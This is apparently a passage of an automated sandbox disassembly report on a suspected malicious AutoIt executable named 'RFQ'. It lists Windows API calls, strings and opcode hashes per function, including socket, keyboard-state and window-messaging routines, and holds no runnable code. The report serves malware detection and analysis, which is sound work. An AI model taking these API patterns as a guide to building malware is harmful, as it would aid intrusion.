                                                                            • Instruction ID: 592472379a13f64a36775ddfe4c19020deeca6e29305e90706455326f51c7197
                                                                            • Opcode Fuzzy Hash: 77e17db8bc1bd91d4f462b4741b11cacb8ad7c9d2b564e2e53a4838a6d469423
                                                                            • Instruction Fuzzy Hash: D151D0705063899BDF21CF6AD884BEFBBF6AF44714F249119E801D7290EB709945CB61
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 006EC831
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: fc63ffc5d2a232078bc43dddfd928e881257d09c41408d2ce288fdb1a22fda48
                                                                            • Instruction ID: 58193ab2ab2bcd5631072213840f027bd0a229f143e7a43a195a2d3293a75f7e
                                                                            • Opcode Fuzzy Hash: fc63ffc5d2a232078bc43dddfd928e881257d09c41408d2ce288fdb1a22fda48
                                                                            • Instruction Fuzzy Hash: F2112B7164A3467AE7015A559C82DEF2FDD9F16334B20003DF901A53C2E7E46D03456D
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 642191829-3771769585
                                                                            • Opcode ID: b3cffce7eb7797c6746ae79a8fd4889b5bdc4c9b9ce745ade56822f5574b7fbc
                                                                            • Instruction ID: 22f8d05b593fc290be427432380b2de51187c1e31b07c9a9f1b788ec1a67072e
                                                                            • Opcode Fuzzy Hash: b3cffce7eb7797c6746ae79a8fd4889b5bdc4c9b9ce745ade56822f5574b7fbc
                                                                            • Instruction Fuzzy Hash: 8B11E172900214AFDB61BBA9DC4AEEF37BDDF42310F004069F005A60D2EFB48E818B64
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 952045576-0
                                                                            • Opcode ID: be594d5ee26ca5c9da6fc3289d970b4a8368299c6c55862f1b0a8c05c667f214
                                                                            • Instruction ID: 2efbc6734c0420eaa21c2943d4dcc2a626467fbcad341193d44db7bb5681c585
                                                                            • Opcode Fuzzy Hash: be594d5ee26ca5c9da6fc3289d970b4a8368299c6c55862f1b0a8c05c667f214
                                                                            • Instruction Fuzzy Hash: ED419065C1125475CB51FBF4CC4AACFB7AAAF06300F50846AF518E3162FA34E741C7A9
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006DEEDF,00000004,00000000,00000000), ref: 0069EF72
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,006DEEDF,00000004,00000000,00000000), ref: 006DF0EE
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006DEEDF,00000004,00000000,00000000), ref: 006DF171
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: ac44ecd3ecba62438045f25668b407009c9836a146d801cc4ed37be5e93e0a5b
                                                                            • Instruction ID: de4b58a08dca6b0fea82b0894988bf8cc18a3238b31a01f54f63272a718e00b8
                                                                            • Opcode Fuzzy Hash: ac44ecd3ecba62438045f25668b407009c9836a146d801cc4ed37be5e93e0a5b
                                                                            • Instruction Fuzzy Hash: 2641D431608680EADF35CB2DCC987EA7BABEB45310F18851FE04746FA1C677A881CB51
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00712C4E
                                                                            • GetDC.USER32(00000000), ref: 00712C56
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00712C61
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00712C6D
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00712CA9
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00712CBA
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0071599A,?,?,000000FF,00000000,?,000000FF,?), ref: 00712CF5
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00712D14
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 733fca665ed7fade9b7e10656753ff16ef9220495f049ed279a1f02a711c2bf7
                                                                            • Instruction ID: e3d85f0799b22176dfaecbf8e8525fd8ede61c750fbff1a80b73f5da37f8ae00
                                                                            • Opcode Fuzzy Hash: 733fca665ed7fade9b7e10656753ff16ef9220495f049ed279a1f02a711c2bf7
                                                                            • Instruction Fuzzy Hash: CC317F72241214BFEB118F58DC49FFB3BA9EF09711F048055FE489A1D1C6799851C7A8
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: d2efb115d70b0cc34ea0b11fdbdf9374d916e554be403171daf85004ce7417ea
                                                                            • Instruction ID: 2866eeaafa23f51075b1e5f0b4fbd927d565b7f403a857d034b65449067da636
                                                                            • Opcode Fuzzy Hash: d2efb115d70b0cc34ea0b11fdbdf9374d916e554be403171daf85004ce7417ea
                                                                            • Instruction Fuzzy Hash: D221F5A1602B097BDB007A168D42FEF636F9F1239CF540024FD069A681E758EE11CAE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 3d01e63e4d1b6a2d06455616f868530ff84f9981cf0a74075653d8cca8472d42
                                                                            • Instruction ID: e2c3894e3d5712b41c147cebeed29682c668567db71202e85ab6c8b362d5cbb6
                                                                            • Opcode Fuzzy Hash: 3d01e63e4d1b6a2d06455616f868530ff84f9981cf0a74075653d8cca8472d42
                                                                            • Instruction Fuzzy Hash: 89D18EB5A0060ADFDF10CFA8C881AAEB7F5BF48314F148669E915AB281E775ED41CF50
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(?,?), ref: 006C156E
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 006C15F1
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006C1684
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 006C169B
                                                                              • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006C1717
                                                                            • __freea.LIBCMT ref: 006C1742
                                                                            • __freea.LIBCMT ref: 006C174E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                            • String ID:
                                                                            • API String ID: 2829977744-0
                                                                            • Opcode ID: 12ca2677c90889514164c460f38996236c59c1bf06af7bebe7d39948de97f80e
                                                                            • Instruction ID: 3949476c2072f0811ee6b909a44e8c62f3fa0aa4033b345fdde20b4f4f66b4a4
                                                                            • Opcode Fuzzy Hash: 12ca2677c90889514164c460f38996236c59c1bf06af7bebe7d39948de97f80e
                                                                            • Instruction Fuzzy Hash: 2F91B2B2E002199ADF218E64C841FFE7BA6DF47350F58455DE906EF242DB35DD418BA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 9943c16f49050c43c311c0d28d3a4256842fc57f4099062b33667a8d7f4d6763
                                                                            • Instruction ID: 59af383a9a0fcaca500eb08b389420f7e2225cb922c4d08e73bb5e264e66be47
                                                                            • Opcode Fuzzy Hash: 9943c16f49050c43c311c0d28d3a4256842fc57f4099062b33667a8d7f4d6763
                                                                            • Instruction Fuzzy Hash: BC912571D40219AFCF10CFE9CC84AEEBBBAFF49320F14815AE515B7251D278A941CBA5
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00703892
                                                                            • CharUpperBuffW.USER32(?,?), ref: 007039A1
                                                                            • _wcslen.LIBCMT ref: 007039B1
                                                                            • VariantClear.OLEAUT32(?), ref: 00703B46
                                                                              • Part of subcall function 006F0BFD: VariantInit.OLEAUT32(00000000), ref: 006F0C3D
                                                                              • Part of subcall function 006F0BFD: VariantCopy.OLEAUT32(?,?), ref: 006F0C46
                                                                              • Part of subcall function 006F0BFD: VariantClear.OLEAUT32(?), ref: 006F0C52
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4137639002-1221869570
                                                                            • Opcode ID: 57376587e4601bbca6c01140211f1a0d37b3b9d0fd0f4220c203a8e78e4d450b
                                                                            • Instruction ID: 4fc0c50f61a154dd9d6ddbf5af799b7693b4c518cc885343001cf4c19dd7f80a
                                                                            • Opcode Fuzzy Hash: 57376587e4601bbca6c01140211f1a0d37b3b9d0fd0f4220c203a8e78e4d450b
                                                                            • Instruction Fuzzy Hash: 44915874608341DFC700EF68C48596AB7E9BF89314F148A2DF88A8B391DB75EE05CB52
                                                                            APIs
                                                                              • Part of subcall function 006DFEF7: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF14
                                                                              • Part of subcall function 006DFEF7: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF2F
                                                                              • Part of subcall function 006DFEF7: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF3D
                                                                              • Part of subcall function 006DFEF7: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF4D
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00704B78
                                                                            • _wcslen.LIBCMT ref: 00704C80
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00704CF6
                                                                            • CoTaskMemFree.OLE32(?), ref: 00704D01
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 614568839-2785691316
                                                                            • Opcode ID: 5b1c9a0879e17810d1a93cea850771078771793e679f4198800dac8e3761a2cb
                                                                            • Instruction ID: de5291532e69d26d4435f6c54fdfaec21b6f8320cd1808109bab05ffcf1c9190
                                                                            • Opcode Fuzzy Hash: 5b1c9a0879e17810d1a93cea850771078771793e679f4198800dac8e3761a2cb
                                                                            • Instruction Fuzzy Hash: D69119B1D01219EFDF10DFA4D891AEEB7B9BF08310F108269E915A7291EB749E44CF64
                                                                            APIs
                                                                            • GetMenu.USER32(?), ref: 007120B6
                                                                            • GetMenuItemCount.USER32(00000000), ref: 007120E8
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00712110
                                                                            • _wcslen.LIBCMT ref: 00712146
                                                                            • GetMenuItemID.USER32(?,?), ref: 00712180
                                                                            • GetSubMenu.USER32(?,?), ref: 0071218E
                                                                              • Part of subcall function 006E3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E399F
                                                                              • Part of subcall function 006E3985: GetCurrentThreadId.KERNEL32 ref: 006E39A6
                                                                              • Part of subcall function 006E3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006E24F7), ref: 006E39AD
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00712216
                                                                              • Part of subcall function 006EE899: Sleep.KERNEL32 ref: 006EE911
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 4196846111-0
                                                                            • Opcode ID: ed374e27d8286311abefd49b392d2f68c3c6f598ed91625d6e45f19162819221
                                                                            • Instruction ID: c5eedfce6bd14340ddbf7b7ba84341ef720e4f6df44b68fd80c07264c4978e80
                                                                            • Opcode Fuzzy Hash: ed374e27d8286311abefd49b392d2f68c3c6f598ed91625d6e45f19162819221
                                                                            • Instruction Fuzzy Hash: 27718475A00205AFCB40EF68C845AEEB7F5EF49310F158459E915EB392D739ED82CB90
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 006EAE17
                                                                            • GetKeyboardState.USER32(?), ref: 006EAE2C
                                                                            • SetKeyboardState.USER32(?), ref: 006EAE8D
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 006EAEBB
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 006EAEDA
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 006EAF1B
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006EAF3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: a1a478286591f5fa41b490d1c080dabedd2bb393e0416fa4e09637fb65e44d4a
                                                                            • Instruction ID: 43e8952da4945bf4d7c9f25fecf4d5f249d3ef8d67248cf14c9e478a6c95c8fd
                                                                            • Opcode Fuzzy Hash: a1a478286591f5fa41b490d1c080dabedd2bb393e0416fa4e09637fb65e44d4a
                                                                            • Instruction Fuzzy Hash: 1251EFB06057D13DFB3643BA8C45BFABEAB5B06304F088589F0D5459D2D798BC84E752
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 006EAC37
                                                                            • GetKeyboardState.USER32(?), ref: 006EAC4C
                                                                            • SetKeyboardState.USER32(?), ref: 006EACAD
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006EACD9
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006EACF6
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006EAD35
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006EAD56
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 9927f635ea3961094473d9d63070f8ec6ec093594250591808690812ad52ede5
                                                                            • Instruction ID: 4fa09a4bfbec00b397df6f586e8fcc252eb2a9bbab1fd64e539ffe738a59e262
                                                                            • Opcode Fuzzy Hash: 9927f635ea3961094473d9d63070f8ec6ec093594250591808690812ad52ede5
                                                                            • Instruction Fuzzy Hash: 4151F4B09467D53EFB3283B58C55BF67E9B6F01700F08898CE0D5469D2C694BC84D762
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 006A2CDB
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 006A2CE3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 006A2D71
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 006A2D9C
                                                                            • _ValidateLocalCookies.LIBCMT ref: 006A2DF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: 71d17ec820d2b638cfaefe77c3c6dc1d1ee7b375718e10124b4dee9c879f5ea5
                                                                            • Instruction ID: 3433dc5f4bc3a75a751114bfa230860ed11b0204d9994bb9f717ac5f68eb39b1
                                                                            • Opcode Fuzzy Hash: 71d17ec820d2b638cfaefe77c3c6dc1d1ee7b375718e10124b4dee9c879f5ea5
                                                                            • Instruction Fuzzy Hash: A7419234A4021AABCF10FF6CC854A9EBBA6AF46324F148159E8155B392D735EE01CF90
                                                                            APIs
                                                                              • Part of subcall function 00702F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00702FA1
                                                                              • Part of subcall function 00702F75: _wcslen.LIBCMT ref: 00702FC2
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00701039
                                                                            • WSAGetLastError.WSOCK32 ref: 00701048
                                                                            • WSAGetLastError.WSOCK32 ref: 007010F0
                                                                            • closesocket.WSOCK32(00000000), ref: 00701120
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 2675159561-0
                                                                            • Opcode ID: f6e47cb0079ba117e14a26443561420e8d02b242066898aa91e7a807389ca357
                                                                            • Instruction ID: 4eed64a43f864841430837220c1259aa76b9d40877075f1c649e1417068da989
                                                                            • Opcode Fuzzy Hash: f6e47cb0079ba117e14a26443561420e8d02b242066898aa91e7a807389ca357
                                                                            • Instruction Fuzzy Hash: 1D410131600104EFDB109F68C884BAAB7EAFF45324F54C219F845AB2D2C779AD81CBE5
